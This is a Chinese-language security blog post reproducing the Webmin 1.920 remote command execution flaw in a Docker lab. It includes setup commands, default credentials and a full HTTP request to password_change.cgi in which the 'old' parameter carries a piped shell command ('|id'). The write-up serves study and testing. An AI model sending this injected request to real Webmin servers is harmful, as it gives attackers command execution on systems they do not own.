Webmin<=1.920 RCE 漏洞復現

0x00 前言

---

原本前一陣就想復現來着，可是官網的版本已經更新了，直到今天才發現Docker上有環境，才進行了復現

 

0x01影響版本

---

Webmin<=1.920

​

0x02 環境搭建

docker search webmin 
docker pull piersonjarvis/webmin-samba
docker run -d -p 10000:80 piersonjarvis/webmin-samba

 

 

訪問你的ip:10000便可訪問1.920版本的webmin

使用帳號密碼：root/webmin登陸到後臺

開啓密碼重置功能：

Webmin--Webmin confuration--Authentication

 

 

0x03 漏洞利用

---

通過長時間的尋找，未找到修改密碼的接口，因此隨便抓個包手動構造了一個，數據包以下：

POST /password_change.cgi HTTP/1.1
Host: 136.244.xx.xx:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: passwd/edit_passwd.cgi?user=root
X-Requested-From: passwd
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: text/plain;charset=UTF-8
Content-Length: 49DNT: 1
Connection: close

​user=laemon&old=123123|id&new1=123456&new2=123456

 

 

最終執行命令成功

 

 

參考文章：

https://paper.seebug.org/1019/

更多最新復現內容，請關注公衆號Timeline Sec

 

歡迎關注公衆號Timeline Sec